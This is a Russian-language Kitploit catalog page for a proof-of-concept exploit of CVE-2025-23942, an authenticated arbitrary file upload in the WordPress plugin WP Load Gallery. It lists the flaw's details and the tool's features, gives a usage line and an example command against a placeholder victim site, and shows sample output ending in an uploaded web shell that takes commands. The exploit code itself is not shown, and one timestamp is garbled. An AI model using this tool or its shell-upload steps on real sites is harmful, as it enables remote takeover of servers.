Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-23942-poc — WP Load Gallery <= 2.1.6 - Произвольная загрузка файлов для аутентифицированных пользователей (Автор+) | Kitploit
Инструменты/GitHubGitHub/nxploited/cve-2025-23942-poc
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubnxploited/cve-2025-23942-poc

CVE-2025-23942-poc

WP Load Gallery <= 2.1.6 - Произвольная загрузка файлов для аутентифицированных пользователей (Автор+)

Репозиторий
351 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

WP Load Gallery Exploit (CVE-2025-23942)

📌 Описание

Уязвимость неограниченной загрузки файлов опасного типа (Unrestricted Upload of File with Dangerous Type) в плагине NgocCode WP Load Gallery позволяет загрузить веб-шелл на веб-сервер. Проблема затрагивает WP Load Gallery: с n/a по 2.1.6.

⚠️ Сведения об уязвимости

  • Идентификатор CVE: CVE-2025-23942
  • Затронутый плагин: WP Load Gallery
  • Затронутые версии: вплоть до 2.1.6
  • Тип уязвимости: Неограниченная загрузка файлов
  • Критичность: Критическая (9.1 CVSS)
  • Вектор атаки: Удалённое выполнение кода (RCE) для аутентифицированных пользователей (Author+)
  • Патч доступен: ❌ (Официального патча пока нет)

🚀 Возможности эксплойта

✅ Автоматическая эксплуатация – автоматически извлекает nonce, выполняет вход и загружает шелл.
✅ Проверка версии – подтверждает, уязвима ли цель, перед началом эксплуатации.
✅ Обработка ошибок – обеспечивает стабильное выполнение даже при сбоях.
✅ Управление сессиями – использует постоянное управление сессиями для аутентификации.
✅ Обратная связь в реальном времени – выводит результат на каждом шаге.

🛠️ Требования

  • Python 3.x
  • Модуль requests (pip install requests)
  • Действительная учётная запись WordPress Author+ на целевой системе

🔥 Использование

Запустите скрипт с необходимыми параметрами:

usage: CVE-2025-23942.py [-h] -u URL -un USERNAME -p PASSWORD

Exploit WP Load Gallery - Arbitrary File Upload

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Target WordPress URL (e.g., https://example.com)
  -un USERNAME, --username USERNAME
                        WordPress Username
  -p PASSWORD, --password PASSWORD
                        WordPress Password

Пример:

python CVE-2025-23942.py -u http://victim-site.com -un author_user -p password123

📝 Пример вывода

   _______      ________    ___   ___ ___  _____     ___  ____   ___  _  _ ___  
  / ____\ \    / /  ____|  |__ \ / _ \__ \| ____|   |__ \|___ \ / _ \| || |__ \ 
 | |     \ \  / /| |__ ______ ) | | | | ) | |__ ______ ) | __) | (_) | || |_ ) |
 | |      \ \/ / |  __|______/ /| | | |/ /|___ \______/ / |__ < \__, |__   _/ / 
 | |____   \  /  | |____    / /_| |_| / /_ ___) |    / /_ ___) |  / /   | |/ /_ 
  \_____|   \/   |______|  |____|\___/____|____/    |____|____/  /_/    |_|____|

[+] Checking plugin version...
[+] Detected version: 2.1.6
[+] The target is vulnerable! Proceeding with exploitation...
[+] Logged in successfully.
[+] Extracting wplg_nonce...
[+] Extracted wplg_nonce: a1b2c3d4e5
[+] Uploading shell...
[+] File uploaded successfully!
[+] Shell is accessible at: http://victim-site.com/wp-content/uploads/2025/02/nxploit.php?cmd=id

📜 Правовое предупреждение

Данный эксплойт предназначен только для образовательных целей и исследований в области безопасности. Не используйте его на системах, которыми вы не владеете или для тестирования которых у вас нет явного разрешения. Автор не несёт ответственности за любое неправомерное использование этого скрипта. ( Khaled_alenazi )

Скачать инструмент